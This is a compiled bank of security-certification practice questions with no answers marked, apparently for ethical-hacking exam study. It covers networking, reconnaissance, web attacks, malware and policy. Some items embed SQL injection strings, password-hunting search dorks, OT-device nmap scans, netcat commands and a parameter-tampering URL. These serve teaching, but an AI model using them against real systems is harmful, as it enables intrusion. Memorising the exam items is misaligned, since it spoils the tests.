In your network, the website is no longer accessible. The website's IP address is 12.34.56.78 and you are able to ping it. The website is accessible with its IP but users are not able to access it using its URL (www.ABCompany.com). What may be the problem?. UDP Port 53 is Blocked. TCP Port 80 is Blocked. TCP Port 54 is Blocked. UDP Port 80 is Blocked.

Which option is a web server scanner which performs vulnerability scanning against web servers for multiple items including dangerous files, CGI and programs?. Nikto. John the Ripper. Dsniff. Snort.

To evaluate SQL injection attack, an ethical hacker performs two commands, first command is to test the response time of a true or false response using SQL injection attack and second command to determine whether the database will return true or false results for user IDs? Which option is correct regarding the SQL injection types that is used by the ethical hacker?. Out of band and boolean-based. Union-based and error-based. Time-based and union-based. Time-based and boolean-based.

A user has downloaded and installed a gaming app in a third-party app store. Once the user has installed the app, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed in the above scenario?. SIM card attack. Clickjacking. SMS phishing attack. Agent Smith attack.

What port is often used by Infected IoT devices to spread malware and send results to the threat actor?. 22. 48101. 80. 443.

Attackers initiate spear-phishing emails with custom-made malware to compromise user accounts of staff members or cloud service firms to obtain confidential information. an attacker infiltrates target MSP provider and distributes malware to gain remote access. The attacker then accesses the target customer profiles with his/her MSP account, compresses the customer data, and stores them in the MSP. The attacker then extracts the information from the MSP and uses that information to launch further attacks on the target organization and users. Which of the following options did attackers perform in the above scenario?. Cloud cryptojacking. Man-in-the-cloud (MITC) attack. Cloud hopper attack. Cloudborne attack.

Alex a pen-tester, to detect viruses in the systems, uses a detection method where anti- virus executes the malicious codes on a virtual machine to simulate CPU and memory activities. Which type of virus detection method did Alex use in this context?. Heuristic Analysis. Code Emulation. Scanning. Integrity checking.

------------------ is an attack where the attackers exploit vulnerabilities in dynamically generated web pages to inject client-side script into web pages viewed by other users. LDAP Injection attack. Cross-Site Scripting (XSS). SQL injection attack. Cross-Site Request Forgery (CSRF).

---------------- file contains information of your package, including components of the application such as activities, services, broadcast receivers, content providers in an Android application?. AndroidManifest.xml. classes.dex. APK.info. resources.asrc.

ABCompany, a power plant company, has connected all the industrial control systems to the Internet to automate the operation of critical infrastructure from a remote location. To empower manufacturers and utility companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service continuity, the organization decided to install an OT security tool. Which tool ABCompany can use to protect its critical infrastructure?. Robotium. BalenaCloud. Flowmon. IntentFuzzer.

Using which cloud-hosted solution, the provider will take care of the hardware, operating system, and software administration including patching and monitoring. In this case the only administrative task that your company will need to perform is the management of user accounts. Iaas. Saas. PaaS. Caas.

---------------- is a security architecture developed to increase the confidentiality of information exchanged over the insecure Internet. SOA. biometrics. single sign on. PKI.

Sending email using SMTP does not encrypt email. It means an unauthorized person can read the emails. To encrypt it you are able to upgrade a connection between two mail servers to use TLS. Email transmitted by SMTP over TLS is encrypted. What is the name of the command used by SMTP to transmit email over TLS?. EXPLICITTLS. UPGRADETLS. IMPLICITTLS. STARTTLS.

Shellshock is a vulnerability in the Bash shell, a user interface that uses a command-line interface to access an operating system’s services. Which operating systems and devices are NOT known to be affected directly by the Shellshock vulnerability?. Linux. Unix. OS X. Windows.

------------- is a layer 3 protocol that you can use it for end-to-end encryption of the FTP traffic which is not encrypted by default??. SFTP. Ipsec. SSL. FTPS.

A user in XYZ company visits a web site which contains interesting and attractive content like 'Do you want to win iPhone 13? He clicks the link which in reality is an invisible iframe which is setup by the attacker, so the victim thinks that he clicks on the 'Do you want to win iPhone 13? Which of the following attacks is described above?. Session Fixation. HTML Injection. HTTP Parameter Pollution. Clickjacking Attack.

Bob performs a syn scan in ABCompany network and he finds that the syslog server (192.168.10.15) is not receiving the alert message from snort (192.168.10.10). He runs Wireshark in the snort server to check if the messages are going to the syslog server. What Wireshark filter will show the connections from the snort machine to kiwi syslog machine?. tcp.srcport= = 514 && ip.src= = 192.168.10.10. tcp.srcport= = 514 && ip.src= = 192.168.10.15. tcp.dstport= = 514 && ip.dst= = 192.168.10.10. tcp.dstport= = 514 && ip.dst= = 192.168.10.15.

To assess the security of the email gateway, you craft the below email message and send it across the Internet to a user of ABCompany.com. From: assess@ABCompany.com To: user@ABCompany.com Subject: Security assessment Date: 9/9/2022 10:25 If The user receives your email, it proves ABCompany.com email gateway doesn't prevent ----------------. Email Masquerading. Email Harvesting. Email Phishing. Email Spoofing.

You have received an email from your manager and he asked you to add a rule on the firewall to allow RDP access to some internal servers from the Internet. Next week, your manager denies that he had ever sent any mail. Which of the following proves that it was your manager who has sent the Email?. Non-Repudiation. Integrity. Authentication. Confidentiality.

Session splicing is an IDS evasion technique that exploits how some IDS do not reconstruct sessions before pattern-matching the data. The attacker divides the data in the packets into small portions of a few bytes and evades the string match while delivering the data. Which tool can be used to perform session splicing attacks?. tcpsplice. Burp. Hydra. Whisker.

From the security point of view, we need to disable or remove unnecessary ISAPI filters, to -------. Mitigate the risks of social engineering attacks. Mitigate the risks of webserver attacks. Mitigate the risks of SQL injection attacks. Mitigate the risks of WAP attacks.

In a Web browser, the following URL is requested: http://www.mydomain.com/example.asp?accountnumber=12345&debitamount=1 An attacker may change the accountnumber and debitamount in order to debit another account: http://www.mydomain.com/example.asp?accountnumber=67891&debitamount=9999 Which type of vulnerability is present on this site?. Cookie Tampering. SQL Injection. Web Parameter Tampering. XSS Reflection.

To perform an SQL injection attack on a target website, Bob is using an evasion technique by placing characters such as "` or '1'='1'" in any basic injection statement such as "or 1=1" or with other accepted SQL comments. Which of the following evasion technique is used by Bob?. Char encoding. IP fragmentation. Variation. Null byte.

----------------- is an 802.11 Layer-2 wireless network detector, sniffer, and intrusion detection system. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and macOS. Kismet. Abel. Netstumbler. Nessus.

Alex is going to Jailbreak his IOS device. In this technique he turns the device off and back on, the device will start up completely and the kernel will be patched without the help of a computer, in other words, the device will be jailbroken after each reboot. Which IOS jailbreaking technique he is going to use?. Tethered jailbreaking. Semi-untethered jailbreaking. Semi-tethered jailbreaking. Untethered jailbreaking.

To scan open ports and running services on systems connected to the organization's OT network, hackers use an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap command helps attackers to retrieve the required information?. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >. nmap -Pn -sU -p 44818 --script enip-info < Target IP >. nmap -Pn -sT -p 46824 < Target IP >. nmap -Pn -sT -p 102 --script s7-info < Target IP >.

Using which cloud deployment option, a customer can join with a group of users or organizations to share a cloud environment. Private. Community. Public. Hybrid.

IPsec is a group of protocols that are used together to set up secured connections between devices. It helps keep data sent over public networks secure. Which of the following options is NOT a feature of IPsec. Protect the payload and the headers. Encrypt. Work at the Data Link Layer. Authenticate.

Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyberattack. In which phase the IH&R team further analyses the compromised device to find incident details such as the type of attack, its severity, target, impact, and method of propagation, and any vulnerabilities it exploited. Incident triage. Preparation. Incident recording and assignment. Eradication.

An attacker is surfing the internet and trying to gather information about a company. Which hacking process is it calling?. Scanning. Footprinting. Enumeration. System Hacking.

A white hat hacker runs Nmap scan with -oX switch, what does this flag do in an Nmap scan?. Perform an eXpress scan. Output the results in truncated format to the screen. Output the results in XML format to a file. Perform an Xmas scan.

Which of the following is a set of extensions to DNS that provide protection against known threats to the DNS and authenticate responses to domain name lookups?. DNSSEC. Resource records. Resource transfer. Zone transfer.

Which of the following viruses tries to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. Macro virus. Stealth/Tunneling virus. Cavity virus. Polymorphic virus.

A hacker found a zero-day vulnerability on a server. She called the owner of the server to let them know about the vulnerability and how they can protect themselves from that vulnerability. She also sent an email to the vendor describing the problem. What type of hacker is she?. Black hat. White hat. Gray hat. Red hat.

Container technology has a five-tier architecture, which of the following tiers of the container technology architecture allows verifying and validating image contents, signing images, and sending them to the registries. Tier-1: Developer machines. Tier-2: Testing and accreditation systems. Tier-3: Registries. Tier-4: Orchestrators.

What is the best way to pass traffic undetected and evade IDS?. Install Netcat and encrypt all outgoing traffic from this server. Use HTTP to pass traffic and evade the internal IDS. Install Cryptcat and encrypt outgoing packets from this server. Use Telnet to encrypt all outgoing traffic from this server.

Which of these devices would not be considered part of the Internet of Things?. Smartphone. Thermostat. Light bulb. Set-top cable box.

If you wanted a lightweight protocol to send real-time data over, which of these would you use?. TCP. HTTP. ICMP. UDP.

What order, from bottom to top, does the TCP/IP architecture use?. Network Access, Network, Transport, Application. Link, Internet, Transport, Application. Physical, Network, Session, Application. Data Link, Internet, Transport, Application.

Which of these services would be considered a storage as a service solution?. Microsoft Azure. iCloud. Google Compute. DropLeaf.

The UDP headers contain which of the following fields?. Source address, destination address, checksum, length. Destination port, source port, checksum, length. Flags, source port, destination port, checksum. Length, checksum, flags, address.

What are the three steps in the TCP handshake as described by the flags set?. SYN, SYN/URG, RST. ST, SYN, ACK. SYN, SYN/ACK, ACK. SYN, SYN/ACK, ACK/URG.

Which of these protocols would be used to communicate with an IoT device?. ICMP. SMTP. Telnet. HTTP.

Which network topology are you most likely to run across in a large enterprise network?. Ring topology. Bus topology. Full mesh. Star-bus hybrid.

If you were to see the subnet mask 255.255.252.0, what CIDR notation (prefix) would you use to indicate the same thing?. /23. /22. /21. /20.

Which of these addresses would be considered a private address (RFC 1918 address)?. 172.128.10.5. 9.10.10.7. 172.20.128.240. 250.28.17.10.

If you were looking for the definitive documentation on a protocol, what would you consult?. Request for comments. Manual pages. Standards. IEEE.

The PDU for TCP is called a ______________. Packet. Datagram. Frame. Segment.

13. Which header field is used to reassemble fragmented IP packets?. Source address. IP identification. Don’t fragment bit. Acknowledgment field.

14. Which protocol is necessary to enable the functionality of traceroute?. HTTP. SNMP. ICMP. IP.

15. What is a MAC address used for?. Addressing systems over a VPN. Addressing systems through a tunnel. Addressing systems over TCP. Addressing systems on the local network.

To remove malware from the network before it gets to the endpoint, you would use which of the following?. Packet filter. Application layer gateway. Unified threat management appliance. Stateful firewall.

If you were on a client engagement and discovered that you left an external hard drive with essential data on it at home, which security principle would you be violating?. Confidentiality. Integrity. Nonrepudiation. Availability.

How would you calculate risk?. Probability * loss value. Probability * mitigation factor. (Loss value + mitigation factor) * (loss value/probability). Probability * mitigation factor.

Which of the following is one factor of a defense-in-depth approach to network design?. Switches. Using Linux on the desktop. Optical cable connections. Access control lists on routers.

How would you ensure that confidentiality is implemented in an organization?. Watchdog processes. Encryption. Cryptographic hashes. Web servers.

6. An intrusion detection system can perform which of the following functions?. Block traffic. Filter traffic based on headers. Generate alerts on traffic. Log system messages.

Which of these would be an example of a loss of integrity?. User making changes to a file and saving it. Bad blocks flagged on disk. Credit cards passed in cleartext. Memory failures causing disk drivers to run incorrectly.

What would you use a security information event manager for?. Aggregating and providing search for log data. Managing security projects. Escalating security events. Storing open source intelligence.

Why is it important to store system logs remotely?. Local systems can’t handle it. Bandwidth is faster than disks. Attackers might delete local logs. It will defend against attacks.

What would be necessary for a TCP conversation to be considered established by a stateful firewall?. Final acknowledgment message. Three-way handshake complete. Sequence numbers aligned. SYN message received.

What is the purpose of a security policy?. To provide high-level guidance on the role of security. To provide specific direction to security workers. To increase the bottom line of a company. To align standards and practices.

What additional properties does the Parkerian hexad offer over the CIA triad?. Confidentiality, awareness, authenticity. Utility, awareness, possession. Utility, possession, authenticity. Possession, control, authenticity.

What important event can be exposed by enabling auditing?. System shutdown. Service startup. Package installation. User login.

What can an intrusion prevention system do that an intrusion detection system can’t?. Generate alerts. Block or reject network traffic. Complete the three-way handshake to bogus messages. Log packets.

Which of these is an example of an application layer gateway?. Web application firewall. Runtime application self-protection. Java applet. Intrusion prevention system.

Which information would a packet filter use to make decisions about what traffic to allow into the network?. HTTP REQUEST message. Ethernet type. UDP source port. SNMP OID.

Which of the following products might be used as an intrusion detection system?. Elastic Stack. Prewikka. Snort. Snorby.

Which of these isn’t an example of an attack that compromises integrity?. Buffer overflow. Man in the middle. Heap spraying. Watering hole.

What type of attack could lead to a direct compromise of availability?. Watering hole. DoS. Phishing. Buffer overflow.

What important function can EDR offer to security operations staff?. Host isolation. Malware detection. Remote data collection. All of the above.

Which type of security control is a firewall?. Administrative. Physical. Technical. Corrective.

Management has been informed of a risk to personally identifiable information (PII) that results from an application being developed and managed by the company. They have chosen not to do anything with the risk. What risk management approach have they taken?. Risk transference. Risk avoidance. Risk mitigation. Risk acceptance.

You’ve been asked to implement a set of standards to support a policy. What type of security control are you developing?. Administrative. Corrective. Logical. Functional.

Your risk management team has asked for a technical control that could mitigate the risk that may be associated with insider threat. Which of these controls would work for that?. Security policy. Identity and access management (IAM) solution. Security standards. Host-based firewall.

An attacker has registered the domain name facebookmailings.com which will be used to send phishing messages out. Which of the MITRE ATT&CK Framework categories would that fall into?. Initial access. Lateral movement. Credential access. Resource development.

If you were checking on the IP addresses for a company in France, what RIR would you be checking with for details?. ARIN. RIPE. AfriNIC. LACNIC.

You need to identify all Excel spreadsheets available from the company Example, Inc., whose domain is example.com. What search query would you use?. site:example.com files:pdf. site:excel files:xls. domain:example.com filetype:xls. site:example.com filetype:xls.

If you found a colleague searching at pgp.mit.edu, what would they likely be looking for?. Email addresses. Company keys. Executive names. Privacy policies.

What information could you get from running p0f?. Local time. Remote time. Absolute time. Uptime.

The DNS server where records for a domain belonging to an organization or enterprise reside is called the ____________ server. Caching. Recursive. Authoritative. Local.

What strategy does a local, caching DNS server use to look up records when asked?. Recursive. Serial. Combinatorics. Bistromathics.

What would you use a job listing for when performing reconnaissance?. Executive staff. Technologies used. Phishing targets. Financial records.

What tool could be used to gather email addresses from Bing, Google, and other sources?. whois. dig. netstat. theHarvester.

What social networking site would be most likely to be useful in gathering information about a company, including job titles?. Twitter. LinkedIn. Foursquare. Facebook.

You see the following text written down—port:502. What does that likely reference?. Shodan search. I/O search. p0f results. RIR query.

What would you use Wappalyzer for?. Analyzing web headers. Analyzing application code. Identifying web headers. Identifying web technologies.

What technique would you ideally use to get all the hostnames associated with a domain?. DNS query. Zone copy. Zone transfer. Recursive request.

What information would you not expect to find in the response to a whois query about an IP address?. IP address block. Domain association. Address block owner. Technical contact.

What would you be looking for with the filetype:txt Administrator:500: Google query?. Text files owned by the administrator. Administrator login from file. Text files including the text Administrator:500:. 500 administrator files with text.

What command would you use to get the list of mail servers for a domain?. whois mx zone=domain.com. netstat zone=domain.com mx. dig domain.com @mx. dig mx domain.com.

What would you get from running the command dig ns domain.com?. Mail exchanger records for domain.com. Name server records for domain.com. Caching name server for domain.com. IP address for the hostname ns.

If you wanted to locate detailed information about a person using either their name or a username you have, which website would you use?. peekyou.com. twitter.com. intelius.com. facebook.com.

If you were looking for detailed financial information on a target company, with what resource would you have the most success?. LinkedIn. Facebook. EDGAR. MORTIMER.

What financial filing is required for public companies and would provide you with the annual report?. 10-Q. 11-K. 401(k). 14A.

If you were looking up information about a company in New Zealand, which RIR would you be looking in for data?. AfriNIC. RIPE. APNIC. LACNIC.

What record would you use to identify a name server associated with a specific domain?. TXT. MX. NS. PTR.

What would you use the website PeekYou for?. DNS lookup. Person search. Identifying domain registrars. Identifying IoT devices.

The following performs two DNS queries. What two records are referenced in this query response? host www.wiley.com www.wiley.com is an alias for www.wiley.com.cdn.cloudflare.net. www.wiley.com.cdn.cloudflare.net has address 104.18.17.99. CNAME, A. CNAME, PTR. A, PTR. PTR, MX.

What are you looking for with the following Google dork, or Google query? site:pastebin .com intext:password.txt. Pasted passwords. Binary data for a password program. A file of passwords on a common storage website. Plaintext usernames and passwords.

What would you use the tool Sherlock for?. Searching for fingerprints. Looking up job information. Looking for potential usernames. Searching domain registrars.

What is the focus of a security audit or vulnerability assessment?. Locating vulnerabilities. Locating threats. Enacting threats. Exploiting vulnerabilities.

What kind of physical access device restricts access to a single individual at any one time?. Checkpoint. Perimeter security. Security zones. Mantrap.

Which of the following is a mechanism for managing digital certificates through a system of trust?. PKI. PKCS. ISA. SSL.

Which protocol is used to create a secure environment in a wireless network?. WAP. WPA. WTLS. WML.

What type of exercise is conducted with full knowledge of the target environment?. White box. Gray box. Black box. Glass box.

You want to establish a network connection between two LANs using the Internet. Which technology would best accomplish that for you?. IPSec. L2TP. PPP. SLIP.

Which design concept limits access to systems from outside users while protecting users and systems inside the LAN?. DMZ. VLAN. I&A. Router.

In the key recovery process, which key must be recoverable?. Rollover key. Secret key. Previous key. Escrow key.

Which kind of attack is designed to overload a system or resource, taking it temporarily or permanently offline?. Spoofing. Trojan. Man in the middle. SYN flood.

Which component of an NIDS collects data?. Data source. Sensor. Event. Analyzer.

What is the process of making an operating system secure from attack called?. Hardening. Tuning. Sealing. Locking down.

The integrity component provides which feature of the CIA triad?. Verification that information is accurate. Verification that ethics are properly maintained. Establishment of clear access control of data. Verification that data is kept private and secure.

Which mechanism is used by PKI to allow immediate verification of a certificate’s validity?. CRL. MD5. SSHA. OCSP.

Which of the following is used to create a VLAN from a physical security perspective?. Hub. Switch. Router. Firewall.

A user has just reported that he downloaded a file from a prospective client using IM. The user indicates that the file was called account.doC) The system has been behaving unusually since he downloaded the file. What is the most likely event that occurred?. Your user inadvertently downloaded a macro virus using IM. Your user may have downloaded a rootkit. Your user may have accidently changed a setting on the system. The system is unstable due to the use of IM.

Which mechanism or process is used to enable or disable access to a network resource based on attacks that have been detected?. NIDS. NIPS. NITS. NADS.

Which of the following would provide additional security to an Internet web server?. Changing the default port for traffic to 80. Changing the default port for traffic to 1019. Changing the default port for traffic to 443. Changing the default port for traffic to 161.

What type of program exists primarily to propagate and spread itself to other systems and can do so without interaction from users?. Virus. Trojan horse. Logic bomb. Worm.

An individual presents herself at your office claiming to be a service technician. She is attempting to discuss technical details of your environment such as applications, hardware, and personnel used to manage it. This may be an example of what type of attack?. Social engineering. Access control. Perimeter screening. Behavioral engineering.

Which of the following is a major security problem with FTP?. Password files are stored in an unsecure area on disk. Memory traces can corrupt file access. User IDs and passwords are unencrypted. FTP sites are unregistered.

Which system would you install to provide detective capabilities within a network?. NIDS. HIDS. NIPS. HIPS.

The process of maintaining the integrity of evidence and ensuring no gaps in possession occur is known as what?. Security investigation. Chain of custody. Three As of investigation. Security policy.

What encryption process uses one piece of information as a carrier for another?. Steganography. Hashing. MDA. Cryptointelligence.

Which policy dictates how assets can be used by employees of a company?. Security policy. User policy. Use policy. Enforcement policy. Acceptable use policy.

Which algorithm is an asymmetric encryption protocol?. RSA. AES. DES. 3DES.

Which of the following is an example of a hashing algorithm?. ECC. PKI. SHA. MD.

Which of the following creates a fixed-length output from a variable- length input?. MD5. MD7. SHA12. SHA8.

Granting access to a system based on a factor such as an individual’s retina during a scan is an example of what type of authentication method?. Smart card. I&A. Biometrics. CHAP.

What item is also referred to as a physical address to a computer system?. MAC. DAC. RBAC. STAC.

What is the process of investigating a computer system for information relating to a security incident?. Computer forensics. Virus scanning. Security policy. Evidence gathering.

Which of the following is seen as a replacement for protocols such as Telnet and FTP?. SSL. SCP. Telnet2. SSH.

Which of the following is commonly used to create thumbprints for digital certificates?. MD5. MD7. SHA12. SHA8.

Granting access to a system based on a factor such as a password is an example of what?. Something you have. Something you know. Something you are. Something you smell.

What item is also referred to as a logical address to a computer system?. IP address. IPX address. MAC address. SMAC address.

How many bits are in an IPv6 address?. 32. 64. 128. 256.

Enumeration is useful to system hacking because it provides __________. Passwords. IP ranges. Configuration. Usernames.

What does the enumeration phase not discover?. Services. User accounts. Ports. Shares.

How would you use Netcat to set up a server on a system?. nc –l –p 192.168.1.1. nc –l –p 1000. nc –p –u 1000. nc –l –p –t 192.168.1.1.

__________ is the process of exploiting services on a system. System hacking. Privilege escalation. Enumeration. Backdoor.

How is a brute-force attack performed?. By trying all possible combinations of characters. By trying dictionary words. By capturing hashes. By comparing hashes.

A __________ is a type of offline attack. Cracking attack. Rainbow attack. Birthday attack. Hashing attack.

An attacker can use a(n) __________ to return to a system. Backdoor. Cracker. Account. Service.

A __________ is used to represent a password. NULL session. Hash. Rainbow table. Rootkit.

A __________ is a file used to store passwords. Network. SAM. Database. NetBIOS.

__________ is a hash used to store passwords in older Windows systems. LM. SSL. SAM. LMv2.

__________ is used to partially encrypt the SAM. SYSKEY. SAM. NTLM. LM.

Which system should be used instead of LM or NTLM?. NTLMv2. SSL. Kerberos. LM.

NTLM provides what benefit versus LM?. Performance. Security. Mutual authentication. SSL.

ADS requires what to be present?. SAM. Domain. NTFS. FAT.

What utility may be used to stop auditing or logging of events?. ADS. LM. NTFS. Auditpol.

On newer Windows systems, what hashing mechanism is disabled?. Kerberos. LM. NTLM. NTLMv2.

Which of the following is a utility used to reset passwords?. TRK. ERC. WinRT. IRD.

A good defense against password guessing is __________. Complex passwords. Password policy. Fingerprints. Use of NTLM.

If a domain controller is not present, what can be used instead?. Kerberos. LM. NTLMv1. NTLMv2.

Alternate Data Streams are supported in which file systems?. FAT16. FAT32. NTFS. CDFS.

Which of the following best describes a web application?. Code designed to be run on the client. Code designed to be run on the server. SQL code for databases. Targeting of web services.

__________ is a client-side scripting language. JavaScript. ASP. ASP.NET. PHP.

Which of the following is an example of a server-side scripting language?. JavaScript. PHP. SQL. HTML.

Which of the following is used to access content outside the root of a website?. Brute force. Port scanning. SQL injection. Directory traversal.

Which of the following can prevent bad input from being presented to an application through a form?. Request filtering. Input validation. Input scanning. Directory traversing.

__________ can be used to identify a web server. Session hijacking. Banner grab. Traversal. Header analysis.

In the field of IT security, the concept of defense in depth is layering more than one control on another. Why would this be helpful in the defense of a system of session hijacking?. To provide better protection. To build dependency among layers. To increase logging ability. To satisfy auditors.

Which of the following is used to set permissions on content in a website?. HIDS. ACE. ACL. ALS.

What could be used to monitor application errors and violations on a web server or application?. HIDS. HIPS. NIDS. Logs.

Which of the following is an attribute used to secure a cookie?. Encrypt. Secure. HttpOnly. Domain.

A POODLE attack targets what exactly?. SSL. TLS. VPN. AES.

What is used to store session information?. Cookie. Snoop. Directory. File.

Which attack can be used to take over a previous session?. Cookie snooping. Session hijacking. Cookie hijacking. Session sniffing.

Which command would retrieve banner information from a website at port 80?. nc 192.168.10.27 80. nc 192.168.19.27 443. nc 192.168.10.27 –p 80. nc 192.168.10.27 –p –l 80.

What is the command to retrieve header information from a web server using Telnet?. telnet < website name > 80. telnet < website name > 443. telnet < website name > –port:80. telnet < website name > –port:443.

Groups and individuals who may hack a web server or web application based on principle or personal beliefs are known as __________. White hats. Black hats. Script kiddies. Hacktivists.

The Wayback Machine would be useful in viewing what type of information relating to a web application?. Get Job postings. Websites. Archived versions of websites. Backup copies of websites.

What may be helpful in protecting the content on a web server from being viewed by unauthorized personnel?. Encryption. Permissions. Redirection. Firewalls.

A common attack against web servers and web applications is __________. Banner grab. Input validation. Buffer validations. Buffer overflow.

Which of the following is a wireless network detector that is commonly found on Linux?. Kismet. Abel. Netstumbler. Nessus.

A security consultant decides to use multiple layers of anti- virus defense, such as end userdesktop anti-virus and E-mail gateway. This approach can be used to mitigate which kind of attack? A. Forensic attack B. ARP spoofing attack C. Social engineering attack D. Scanning attack. Forensic attack. ARP spoofing attack. Social engineering attack. Scanning attack.

Code injection is a form of attack in which a malicious user: Inserts text into a data field that gets interpreted as code. Gets the server to execute arbitrary code using a buffer overflow. Inserts additional code into the JavaScript running in the browser. Gains access to the codebase on the server and inserts new code.

Sid is a judge for a programming contest. Before the code reaches him it goes through arestricted OS and is tested there. If it passes, then it moves onto Sid. What is this middle step called?. Fuzzy-testing the code. Third party running the code. Sandboxing the code. String validating the code.

Q5 - The Payment Card Industry Data Security Standard (PCI DSS) contains six different categories ofcontrol objectives. Each objective contains one or more requirements, which must be followed inorder to achieve compliance. Which of the following requirements would best fit under the objective,"Implement strong access control measures"?. Regularly test security systems and processes. Encrypt transmission of cardholder data across open, public networks. Assign a unique ID to each person with computer access. Use and regularly update anti-virus software on all systems commonly affected by malware.

Which of the following act requires employer's standard national numbers to identify them onstandard transactions?. SOXIT. HIPAA. DMCA. PCI-DSS.

Which of the following is an NMAP script that could help detect HTTP Methods such as GET,POST, HEAD, PUT, DELETE, TRACE?. http-git. http-headers. http enum. http-methods.

Q8 - Fred is the network administrator for his company. Fred is testing an internal switch.From an external IP address, Fred wants to try and trick this switch into thinking it already hasestablished a session with his computer. How can Fred accomplish this?. Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address ofhis computer. He can send an IP packet with the SYN bit and the source address of his computer. Fred can send an IP packet with the ACK bit set to zero and the source address of the switch. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

Q9 - What is the process of logging, recording, and resolving events that take place in anorganization? A. B. C. D. Incident Management Process. Security Policy. Internal Procedure. Metrics.

Q10 - A hacker has managed to gain access to a Linux host and stolen the password file from/etc/passwd. How can he use it?. The password file does not contain the passwords themselves. He can open it and read the user ids and corresponding passwords. The file reveals the passwords to the root user only. He cannot read it because it is encrypted.

Q11 - What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel room. Set a BIOS password. Encrypt the data on the hard drive. Use a strong logon password to the operating system. Back up everything on the laptop and store the backup in a safe place.

Q12 - You are manually conducting Idle Scanning using Hping2. During your scanning you noticethat almost every query increments the IPID regardless of the port being queried. One or two of thequeries cause the IPID to increment by more than one value. Why do you think this occurs?. The zombie you are using is not truly idle. A stateful inspection firewall is resetting your queries. Hping2 cannot be used for idle scanning. These ports are actually open on the target system.

Darius is analysing IDS logs. During the investigation, he noticed that there was nothingsuspicious found and an alert was triggered on normal web application traffic. He can mark this alertas: False-Negative. False-Positive. True-Positive. False-Signature.

What is the proper response for a NULL scan if the port is closed?. SYN. ACK. FIN. PSH. RST. No response.

The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization focused on improving the security of software. What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks?. Injection. Cross Site Scripting. Cross Site Request Forgery. Path disclosure.

Q16 - A recent security audit revealed that there were indeed several occasions that the company's network was breached. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving?. True Positive. False Negative. False Positive. False Positive.

Which vital role does the U.S. Computer Security Incident Response Team (CSIRT) provide?. Incident response services to any user, company, government agency, or organization in partnership with the Department of Homeland Security. Maintenance of the nation's Internet infrastructure, builds out new Internet infrastructure, and decommissions old Internet infrastructure. Registration of critical penetration testing for the Department of Homeland Security and public and private sectors. Measurement of key vulnerability assessments on behalf of the Department of Defense (DOD) and State Department, as well as private sectors.

Q19 - Which of the following is used to indicate a single-line comment in structured query language (SQL)?. --. ||. %%. ''.

Q20 - Supposed you are the Chief Network Engineer of a certain Telco. Your company is planning for a big business expansion and it requires that your network authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network. Which AAA protocol would you implement?. TACACS+. DIAMETER. Kerberos. RADIUS.

Q21 - Which of the following lists are valid data-gathering activities associated with a risk assessment?. Threat identification, vulnerability identification, control analysis. Threat identification, response identification, mitigation identification. Attack profile, defense profile, loss profile. System profile, vulnerability identification, security determination.

Q22 - Which of the following command line switch would you use for OS detection in Nmap?. -D. -O. -P. -X.

Q23 - A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The company accepting bids wants proof of work so the consultant prints out several audits that have been performed. Which of the following is likely to occur as a result?. The consultant will ask for money on the bid because of great work. The consultant may expose vulnerabilities of other companies. The company accepting bids will want the same type of format of testing. The company accepting bids will hire the consultant because of the great work performed.

Q24 - What type of vulnerability/attack is it when the malicious person forces the user's browser to send an authenticated request to a server?. Cross-site request forgery. Cross-site scripting. Session hijacking. Server side request forgery.

Q26 - A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company's internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the- middle attack to occur?. SSL. Mutual authentication. IPSec. Static IP addresses.

If an attacker uses the command SELECT*FROM user WHERE name = 'x' AND userid IS NULL; --'; which type of SQL injection attack is the attacker performing?. End of Line Comment. UNION SQL Injection. Illegal/Logically Incorrect Query. Tautology.

Q122 - What is GINA?. Gateway Interface Network Application. GUI Installed Network Application CLASS. Global Internet National Authority (G-USA). Graphical Identification and Authentication DLL.